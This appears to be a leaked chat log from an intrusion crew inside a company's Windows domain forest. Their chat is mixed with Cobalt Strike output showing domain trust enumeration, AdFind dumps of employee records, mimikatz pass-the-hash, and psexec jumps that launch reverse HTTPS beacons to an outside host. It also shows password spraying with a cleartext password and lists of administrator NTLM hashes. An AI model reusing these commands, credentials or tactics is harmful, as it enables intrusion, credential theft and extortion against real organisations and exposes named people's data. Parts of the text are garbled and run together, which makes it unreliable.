>trustAttributes: 8 [Transitive(8)]
```
``the rest of us?``
> Yeah, there's only a reverse trust
c360.local
```
Using server: AUHDC1-C360-DC1.c360.local:3268
Directory: Windows Server 2012 R2

dn:CN=saig.frd.global,CN=System,DC=c360,DC=local
>whenCreated: 2018/06/08-09:22:10 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

1 Objects returned
```
Are there any more trusts available in this domain among your trusts?
Yes, except for one of them
did you take the trusts off in the "taken" domains?
```
dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/07-00:56:50 Eastern Daylight Time
>name: SaigProd.local
>securityIdentifier: S-1-5-21-3702894564-3969952199-2128771015
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: SaigProd.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]
```
``and I asked you not to touch quarantines, at least it's in quarantine``
dn:CN=c360uk.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2018/07/23-05:59:31 Eastern Daylight Time >name: c360uk.local >securityIdentifier: S-1-5-21-2060452117-3986949954-748576278 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: c360uk.local >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] ``top)= )waaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa beacon> shell dir \\10.225.10.201\c$ [*] Tasked beacon to run: dir \\10.225.10.201\c$ [+] host called home, sent: 53 bytes [+] received output: Volume in drive \10.225.10.201\c$ has no label. Volume Serial Number is 2AC9-2F68 Directory of \10.225.10.201$ 14/03/2019 04:03 AM PerfLogs 29/08/2020 03:26 AM Program Files 14/03/2019 04:14 AM Program Files (x86) 29/08/2020 03:26 AM Temp 29/08/2020 02:52 AM Users 06/10/2020 08:42 AM Windows 0 File(s) 0 bytes 6 Dir(s) 49,648,717,824 bytes free ``You tested with ipac smb_login, try the IP address. beacon> shell dir \\\datacenter.local\c$ [*] Tasked beacon to run: dir \\datacenter.local\c$ [+] host called home, sent: 56 bytes [+] received output: The system cannot find the file specified. see the folders - you can copy the dll and run it with wmik or something then I see no problem to do a pth and check `dir \\\datacenter.local\c$```` [+] 10.225.10.201:445 - 10.225.10.201:445 - Success: 'datacenter.local\adm.brodan0:aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6' Administrator [+] 10.225.10.201:445 - 10.225.10.201:445 - Success: 'datacenter.local\svc.sccmcliinst:aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67' Administrator Give me the results of the smb_login. How are the admins? Are they valid? Did I run them all in smb_login one at a time? Check the validity, just check the error number first. Did you check the smb_login? I guess that's not what's wrong? 
beacon> jump psexec_psh datacenter.local https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH) [+] host called home, sent: 214281 bytes [+] received output: Started service a7c3be0 on datacenter.local [-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 2 beacon> jump psexec64 datacenter.local https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (\datacenter.local\ADMIN$\1f2a452.exe) [+] host called home, sent: 291406 bytes [-] Could not start service 1f2a452 on datacenter.local: 225 ``with the first jump not done ``datacenter.local DA:`` ``` svc.sccmcliinst aa9249f57aba289658fde8afe795fd67 adm.brodan0 06290576382001cd1da4c942e9fa0ca6 ``@user8 you can also go through smblogin to open the domain from the domain you opened in the report too the credentials are valid``. beacon> jump psexec_psh datacenter.local https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH) [+] host called home, sent: 214281 bytes [+] received output: Started service a7c3be0 on datacenter.local [-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 2 \DYA - admin's domainDYA - admin's domain, then do as he said? \pth "remote domain"\YA hash@user7 did you do what? with the domain or as LA? jump or smb_logs more than the ones you already checked then one more try, one, maximum 2 you tried less than 5 times in total on each one, right? Lockout threshold: 10 what is the password policy in the current domain? and before that? these two have now tried one at a time on the jump, brute force does not run you can for the total number of fails and lock accounts how many brute force? i asked another question in smb_login? 
or rather i made a mistake and it for ALL domains the same and it is not necessary) so i as a search, there is 1 part of the hash from the wrong domain how much has tried?did not try 2[ ](https://mediaeveryone.com/group/saiglobal-com?msg=bP3Y7mjhGBpcKyw7P) so i asked[ ](https://mediaeveryone.com/group/saiglobal-com?msg=bP3Y7mjhGBpcKyw7P) so you had 10 admins there? ok a session in the slip, so if anything there drop a session on a distant server did you do through pth the same? and then there came hashes above? dunne 0/2dozhennye all jumped others? beacon> pth datacenter.local\adm.barsmr0 fabb67c5be20e99698dbc77e751afb3f [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:adm.barsmr0 /domain:datacenter.local /ntlm:fabb67c5be20e99698dbc77e751afb3f /run:"%COMSPEC% /c echo d19dee36172 > \.\pipe\eb999d" command [+] host called home, sent: 438886 bytes [+] Impersonated NT AUTHORITY\SYSTEM [+] received output: user : adm.barsmr0 domain : datacenter.local program : C:\Windows\system32\cmd.exe /c echo d19dee36172 > \.\pipe\eb999d impers. : no NTLM : fabb67c5be20e99698dbc77e751afb3f | PID 836 | TID 1784 | LSA Process is now R/W | LUID 0 ; 1753376140 (00000000:6882658c) \_ msv1_0 - data copy @ 000000EAA17DC2B0 : OK ! 
\_ kerberos - data copy @ 000000EABD39BA68 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \des_cbc_md5 -> null \_ des_cbc_crc -> null \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000000EAA17D1D98 (16) -> null beacon> jump psexec_psh datacenter.local https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH) [+] host called home, sent: 214268 bytes [-] Could not open service control manager on datacenter.local: 5 [-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 1909 ``` ``` beacon> rev2self [*] Tasked beacon to revert token beacon> pth datacenter.local\adm.taydav1 24aa312899f051fbc1a5b464de82c802 [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:adm.taydav1 /domain:datacenter.local /ntlm:24aa312899f051fbc1a5b464de82c802 /run:"%COMSPEC% /c echo 3a6015fae67 > \.\pipe\9f382d" command [+] host called home, sent: 31 bytes beacon> jump psexec_psh USHDC1-CSPADS02 https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on USHDC1-CSPADS02 via Service Control Manager (PSH) [+] host called home, sent: 653145 bytes [+] Impersonated NT AUTHORITY\SYSTEM [-] Could not open service control manager on USHDC1-CSPADS02: 1722 [-] Could not connect to pipe (\USHDC1-CSPADS02\pipe\status_d482): 53 [+] received output: user : adm.taydav1 domain : datacenter.local program : C:\Windows\system32\cmd.exe /c echo 3a6015fae67 > \.\pipe\9f382d impers. : no NTLM : 24aa312899f051fbc1a5b464de82c802 | PID 6972 | TID 6260 | LSA Process is now R/W | LUID 0 ; 1752989744 (00000000:687c8030) \_ msv1_0 - data copy @ 000000EAA17DD480 : OK ! 
\kerberos - data copy @ 000000EABD39BD78 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \des_cbc_md5 -> null \_ des_cbc_crc -> null \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000000EAA18BC2F8 (16) -> null ``From the 3rd trust there are no common adminsWhy, with my number of LA hash only on `` Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ``search for >infoad_users? also the field in the dump ADinfo it? there LA sometimes leave creeds in the description can also look in ad_computers in info also empty? but it doesn't have to be)))) and descriptors from the same place I looked not from the datacenter, but from the primary domain :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup:that's what above,kzzzzzznm``` beacon> shell adfind.exe -b dc=c360,dc=local -f "(objectcategory=person)" > C:\Windows\temp\Eula_c360.txt [*] Tasked beacon to run: adfind.exe -b dc=c360,dc=local -f "(objectcategory=person)" > C:\Windows\temp\Eula_c360.txt [+] host called home, sent: 122 bytes [+] received output: AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 ldap_get_next_page_s: [AUSYDHC-ESP-DC1.legalco.local] Error 0xa (10) - Referral `````` >description: Owner: Ludwina Kleiss (REQ0109502) >sAMAccountName: conveyancing >memberOf: CN=DL-Azure-EVCloudSync,OU=Static,OU=Global,OU=Distribution Groups,OU=Control,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-Azure-Saiglb Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global ``` ``` >description: AMS Contractor (obsolete?) 
>cn: Robert Hair "samaccountname" and "memberof" no dn:CN=Robert Hair,OU=Contacts,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global ``` ``` >description: REQ0326018 Expiration date:�21/07/2020 (US00021RAP) >sAMAccountName: shayog0 "memberof" no dn:CN=Yogesh Sharma,OU=Contractor,OU=Alpharetta,OU=Users,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global ``` ``` >description: REQ0341109 Expiration date:14/10/2020 (US00040RAP) >sAMAccountName: mokmil0 >memberOf: CN=SG-GLOBAL-Horizon-QA Salesforce,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-AMER-Horizon-POOL1,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-APAC-Horizon-POOL4,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-EMEA-Horizon-POOL1,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-Intune,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-Pulse Secure VPN,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-Dropbox Users,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=DL-Azure-EVCloudSync,OU=Static,OU=Global,OU=Distribution Groups,OU=Control,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-Jira_Cloud-Users,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-Confluence_Users,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-MFA Okta Verify,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SAIG - OneDrive User Policy,OU=APAC,OU=VDI,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-Azure-M365 License-Standard,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: 
CN=DL-STANDARDS-APPSENG-APAC Digital CI Team,OU=Groups - Distribution,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-GLOBAL-Jira_Cloud-User,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-0365 Core Applications,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-OKTA-Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-WPFB-Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-Azure-Saiglb Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Americas-Citrix-Remote-PC,OU=Groups - Security,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-SP_Hexaware,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-APAC-Citrix-W8VDI_120GB,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-GLOBAL-Security Training,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-GLOBAL-Tosca_User-Prod,OU=SCCM 2012,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-MFA_Gateway,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-GLOBAL-Confluence_User-Prod,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-WSG-General Internet Access,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=SG-APAC-FPS-Developers,OU=Groups - Security,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=DL-REG_APAC,OU=Distribution Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global ``` ``` >description: WebSense manager (copwsg05) service account >sAMAccountName: svc.websense "memberof" no dn:CN=Websense Service,OU=AsiaPac,OU=~Service Accounts,DC=saig,DC=frd,DC=global ``` ``` >description: Used for N-Cenral Scanning (CHG0045156) >sAMAccountName: svc.ncentral 
>memberOf: CN=SAIG Corporate IT SCCM Read Only,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=APAC vCenter ReadOnly,OU=~ Admin Groups - Restricted Access,DC=saig,DC=frd,DC=global >memberOf: CN=SG-AMER-VCENTER-Read Only,OU=Groups - Security,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=Domain Admins,CN=Users,DC=saig,DC=frd,DC=global ``it's just a matter of selecting and scrolling or by pass passw passwd pass :and each one has a description? scroll down and read everything? so if it's like 3k+ users or whatever)or via -it can be listed in ()I have nothing like pwd, password, pass in the description by the way, and if all these trusts are removed - have you looked at the description and info fields ``? saiglobal.com\adm.barsmr0 aad3b435b51404eeaad3b435b51404ee:fabb67c5be20e99698dbc77e751afb3f saiglobal.com\adm.brodan0 aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6 saig.frd.global\adm.taydav1 aad3b435b51404eeaad3b435b51404ee:24aa312899f051fbc1a5b464de82c802 saiglobal.com\adm.bisfra0 aad3b435b51404eeaad3b435b51404ee:6778ead5a63d0e8da0a2235147af85a0 saiglobal.com\adm.brodav1 aad3b435b51404eeaad3b435b51404ee:4f1ef28113c7375b22d3f31bd294fa4e saiglobal.com\adm.evamar1 aad3b435b51404eeaad3b435b51404ee:65a8bca59e4205fc94ed31e11f78d4ac saiglobal.com\adm.kalnic0 aad3b435b51404eeaad3b435b51404ee:d9c4c5a3dca649913994767d6276b9f9 saiglobal.com\adm.kinzac1 aad3b435b51404eeaad3b435b51404ee:52ab4557416b5fd8dfeed6e329db05fb saiglobal.com\adm.turime0 aad3b435b51404eeaad3b435b51404ee:2a0974987cad16892cf57c3f3646e1ea saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67 saig.frd.global\adm.taydav1 aad3b435b51404eeaad3b435b51404ee:24aa312899f051fbc1a5b464de82c802 saig.frd.global\svc.msmap aad3b435b51404eeaad3b435b51404ee:c54366d3aa3826eea0441de8d24a97ee saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67 saig.frd.global\svc-apac-ems-search 
aad3b435b51404eeaad3b435b51404ee:3f42b326ea1826890f7bb977474083dc ```s`svc.sccmcliinst I mean jumpscropped by sqladmin once try it once it's ok but the first part is for 1 domain you need both parts of the hash and you can't check it with the smloginommne 11 ``` 0: 80-20 80-20.com (Direct Outbound) 1: LEADERS leaders.frd.global 2: AUST standards.com.au (Direct Outbound) (Direct Inbound) 3: LEGALCO legalco.local (Direct Outbound) (Direct Inbound) 4: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound) 5: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound) 6: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound) 7: C360 c360.local (Direct Outbound) (Direct Inbound) 8: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound) 9: C360UK c360uk.local (Direct Outbound) (Direct Inbound) 10: SAIG saig.frd.global (Forest 5) (Primary Domain) (Native) ``1 trastpochom thing? everything is fresh, hit the ntlm is fresh? ntlm is fresh, the main thing is not to block i can't jump to any ntlm now, or smb login check for jump ntlm is fresh? 
sqladmin svc.msmap svc-apac-ems-search ``[ ](https://mediaeveryone.com/group/saiglobal-com?msg=q5J9aMTqwWPPZ5TST) I've got some dudes here that don't match me and _*user7* even if you do a ctrl+f in the browser everything matches except sqladmin which doesn't `` adm.matdmy0 adm.barsmr0 svc.sccmcliinst adm.brodan0 svc-amer-ems-search adm.kinzac0 adm.kinzac1 adm.kalnic0 adm.evamar1 adm.turime0 adm.bisfra0 adm.brodav1 adm.taydav1 adm.macpet0 svc.sccmcliinst sqladmin svc.sccmcliinst svc-apac-ems-search ``Successful pings of datacenter.local servers sqladmin svc.sccmcliinst svc-apac-ems-search ``[ ](https://mediaeveryone.com/group/saiglobal-com?msg=KeGz5iQb34qy3GSJQ) remove the crossovers between these and I'll look at `` adm.barsmr0 adm.taydav1 adm.brodan0 sqladmin adm.taydav1 svc.msmap adm.bisfra0 svc.sccmcliinst adm.brodav1 svc-apac-ems-search adm.kinzac0 adm.evamar1 adm.kalnic0 adm.kinzac1 adm.turime0 svc.sccmcliinst ``` any crack on them ? ``don't block them try to ping unreachable ones through that trust ? or try LA, DA, EA go to other accessible? how many domains did you get into ``portscan %.%.0/24 445 icmp 1024 ``portscan categorize them which pinged separately, try to ping them by local admin - makes sense yes ``. i pinged the servers on a "remote" machine from a car i own ``` i'm sorry, i don't understand, you pinged the servers in the remote domain? not the one you're in now, right? 
i'm pinging the subnet now, i don't have access to the PDC as i understand
i pinged the servers in the "remote" domain from the machine which i have
critical only if the hostname is not found - this means that there is no link between the hostname in DNS and the actual machine - usually these are "abandoned" entries
where there is loss - it means no visibility of the host, or it is disabled; often pings are simply filtered by the hardware and these same hosts will ping normally from another place
pings don't need to be broken down into 0% Loss and 100% Loss?
I'm aware of that, you can export - there is an export if it's more convenient for you.
how do you dump a hashdump into a file
hashdump results are saved in cobalt in credentials and you can select the needed hashdumps and copy them to your clipboard
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:16:29> shell nltest /dclist:c360.local
[*] Tasked beacon to run: nltest /dclist:c360.local
[+] host called home, sent: 56 bytes
[+] received output:
Get list of DCs in domain 'c360.local' from '\\AUHDC1-C360-DC1.c360.local'.
AUHDC1-C360-DC1.c360.local [PDC] [DS] Site: AUHDC1-2
AUHDC1-C360-DC2.c360.local [DS] Site: AUHDC1-2
The command completed successfully
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:17:47> shell nltest /dclist:SaigProd.local
[*] Tasked beacon to run: nltest /dclist:SaigProd.local
[+] host called home, sent: 60 bytes
[+] received output:
Get list of DCs in domain 'SaigProd.local' from '\\AUSYDHC-SPPDC03.SaigProd.local'.
AUSYDHC-SPPDC03.SaigProd.local [DS] Site: Default-First-Site-Name AUHDC1-SPPDC02.SaigProd.local [PDC] [DS] Site: Default-First-Site-Name AUHDC1-SPPDC01.SaigProd.local [DS] Site: Default-First-Site-Name The command completed successfully user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:18:35> shell nltest /dclist:standards.com.au [*] Tasked beacon to run: nltest /dclist:standards.com.au [+] host called home, sent: 62 bytes [+] received output: Get list of DCs in domain 'standards.com.au' from '\\ausydhc-austdc1.standards.com.au'. sydcpdc00.standards.com.au [PDC] [DS] Site: SYD ausydhc-austdc1.standards.com.au [DS] Site: SYD The command completed successfully ``How you can put a hash dump into the file to tell you the truth I do not know how except ntlest exactly primal domain controller to allocate, but usually LA on different DCs coincide and even control over RODC will advance us enough in the dumps from the server axis adm.barsmr0 adm.taydav1 adm.brodan0 sqladmin adm.taydav1 svc.msmap adm.bisfra0 svc.sccmcliinst adm.brodav1 svc-apac-ems-search adm.kinzac0 adm.evamar1 adm.kalnic0 adm.kinzac1 adm.turime0 svc.sccmcliinst ``` have their creeds ?yesVerely yes:zany_face: ``` [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.barsmr0:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\svc.sccmcliinst:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.brodan0:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\svc-amer-ems-search:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kinzac0:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kinzac1:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kalnic0:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 
'datacenter.local\adm.evamar1:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.bisfra0:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.brodav1:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.taydav1:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.macpet0:Delta2021$', [-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.matdmy0:Delta2021$', [*] 10.225.10.201:445 - Scanned 1 of 1 hosts (100% complete) `````` Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator msxservice The command completed successfully. ``see the collisions with the current users from DA with the LA list that @user3 you have what EAs in the domain? i.e. @user3 logged in under the DA token from the trusted domain, which turned out to be LA in thismobilize who is in LA``` SAIG\Domain Admins ```Did the LA set from the MAC? 
What's with the pdk? @user3oh here's a straightforward set of LAs`` beacon> shell net localgroup "administrators" [*] Tasked beacon to run: net localgroup "administrators" [+] host called home, sent: 62 bytes [+] received output: Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator adminstaff AndrewB arcserve AVinstall AW1.Service BN.Service CA - ArcServe caroot caunint CR.Service Damien DB.Service Domain Admins Enterprise Admins FL.Service FS-Tank Intranet-Service JF.Service JH.Service JonathanH martin.carlisle mj.service MR.Service msxservice Nathan.harper SAI.service saig.datacentre SAIG\Domain Admins ServiceController SN.Service ST.Service SzeWing.Austen WA.Service Wendy.Glasgow WM.Service The command completed successfully. Why did I increase the size of the chat messages? So that you could throw archives? From the pdk? I did not work under tokin@user3 send me the information I asked plz with the "remote" domain with the domain? And tell me the local admins on the dk in your domain and from which token was 1 attempt at each user should not come to try to smb login user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 21:52:50> shell net use \\\c360.local\c$ Delta2021$ /user:c360.local\adm.turime0 [*] Tasked beacon to run: net use \\\c360.local\c$ Delta2021$ /user:c360.local\adm.turime0 [+] host called home, sent: 94 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. ``` My passssmb_login didn't match either, thenDid it under token from the first time. There are a lot of users and a lot of local admins in the Domain. 
Dot no vershel also.can check on this password other accounts domain admins with authorization through domain trastanu in general yes, the answer we got anyway, the pass does not match `` ``. dn:CN=datacenter.local,CN=System,DC=frd,DC=global >whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time >name: datacenter.local >securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: datacenter.local >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] ``dadatacenter.local is that right there hostname in another domain? beacon> shell net use \\\datacenter.local\c$ Delta2021$ /user:datacenter.local\adm.turime0 [*] Tasked beacon to run: net use \\datacenter.local\c$ Delta2021$ /user:datacenter.local\adm.turime0 [+] host called home, sent: 106 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. ``Try a different domain at once with no jumps no yuztak it is automatically made in the jumpsa it was a token, and you need no yuz)`` beacon> make_token saig.frd.global\adm.turime0 Delta2021$ ``This was a jumper, especially when there is a cleartext creeda the usual net cses better not check such things with a token, I try the last cser with a different domain is with the current domain beacon> rev2self [*] Tasked beacon to revert beacon> make_token saig.frd.global\adm.turime0 Delta2021$ [*] Tasked beacon to create a token for saig.frd.global\adm.turime0 beacon> jump psexec_psh USHDC1-CSPADS02 https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on USHDC1-CSPADS02 via Service Control Manager (PSH) [+] host called home, sent: 214335 bytes [+] Impersonated NT AUTHORITY\SYSTEM [-] Could not open service control manager on USHDC1-CSPADS02: 1722 [-] Could not connect to pipe (\USHDC1-CSPADS02\pipe\status_d482): 53 ``and then also check @tl2c360.local [10.195.43.2]oo it's just my one trust shared, I've already re-hashed the hashes, this 
is a fresh ``Password last set 28/09/2020 9:43:00 AM`1 only(`` adm.turime0:Delta2021$ ``and the password is possible? and the answer will come by itself = ) this is more of a logical than a technical problem, i.e. you can also consult logic and roughly estimate what is a service that can be connected to other domains and what "unlikely" read the descriptions of critical servers, look more closely to the very composition of the AD, in a group logic is simple, administrators do not multiply the services in each domain, saving resources and using the services of the "forest" the second option will be critical MSSQL servers - when you need to exchange data between quarantine and login (for example, some RDBMS aimed at ERP/CRM system) eExchange and similar typical trust "cross-points" are WSUS / SCCM and other "forest" services they most often see quarantined segments because they have an interface there and can be represented there, I recommend checking authorization logs on such servers (sitbelt can do this) and so you can find other users from the trusts in the logs (i will look what is there then? but you will know that the pass from this account in two domains is different and so you will have 2 login errors which will not block an account in another domain) with EA is similar to example ``` net use \\datacenter.local\c$ P@ssword /user:saig.frd.global\adm.brodav1 || net use \\datacenter.local\c$ P@ssword /user:datacenter.local\adm.brodav1 So, there are 2 possible developments, either the current admin will be valid WITH the CURRENT domain or WITH the ACCEPTED one saig.frd.global и datacenter.local ``` ``Congruent YES:`` ``` adm.matdmy0 adm.barsmr0 svc.sccmcliinst adm.brodan0 svc-amer-ems-search adm.kinzac0 adm.kinzac1 adm.kalnic0 adm.evamar1 adm.turime0 adm.bisfra0 adm.brodav1 adm.taydav1 adm.macpet0 ``` ``Congruent EA:`` ``` adm.matdmy0 ``We're interested in file storage, backups, edr, virtualization systemsfind adminsAre we interested? 
``` SolarWinds.MSP.RpcServerService.exe These 2 will have to be searched on WSUS servers Ping request could not find host Anstat.local. Please check the name and try again. Ping request could not find host leaders.frd.global. Please check the name and try again. ``c360.local [10.195.43.2] SaigProd.local [10.195.100.1] standards.com.au [10.195.25.234] removed ad info and YES and general YES from saig.frd.global`datacenter.local [10.225.10.201]` - removed: ADinfo DA EA WinServsk by the way from adjacent domains check the ping not availableAUSYD1-COPADS02.saig.frd.global - 10.200.25.149 (shot hell) get into them dump and td here names and ipso from those 5 visible received ip and he pinged okay, let's what is that on the hostname is not pinged, checked the 445 port) selectively? like out of 254 addresses chose 5 random?) on /24 not scanned, only selectively trasts if he does not see dk, does not mean that does not see anything else? sabnet /24 scanned at this domain to 139,445? another thing packet loss 100 ?that no access from this point is not pinged what does it mean? and from the others? well, yes))) not pinged from the current point?) and half not pinged, about 5 workers) 14 domains, how many done?you have 19 pcs - 5 quarantines with normal trusts sort it out for now leave the karanin domains I do not think that the commands above crashed winlogon did not pay attention when I jumped into winlogon, I think there was nothing what is winlogon? there are two, I missedwinlogon? from what context was the system? or there are 2? or I do not understand it) 80-20 80-20.com ``` is that a whole name? 
took the trusts from the server where I was, I wanted to ping syntax is wrong but that's not the point, it didn't even work and the session crashed out of the trusts ``` dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2008/04/03-00:34:59 Eastern Daylight Time >name: 80-20.com >securityIdentifier: S-1-5-21-789336058-1343024091-1417001333 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: 80-20.com >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] ``domain_trust80-20 80-20.com what are the targets? It didn't even start. portscan 80-20 80-20.com 445 icmp 1024 `````` Use: portscan [targets] [ports] [arp|icmp|none] [max connections] ``Jumped over and the session crashed entire log What could it be for? ``` beacon> net domain_trusts [*] Tasked beacon to run net domain_trusts [+] host called home, sent: 104513 bytes [+] received output: List of domain trusts: 0: 80-20 80-20.com (Direct Outbound) (Direct Inbound) 1: LEADERS leaders.frd.global 2: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound) 3: C360UK c360uk.local (Direct Outbound) (Direct Inbound) 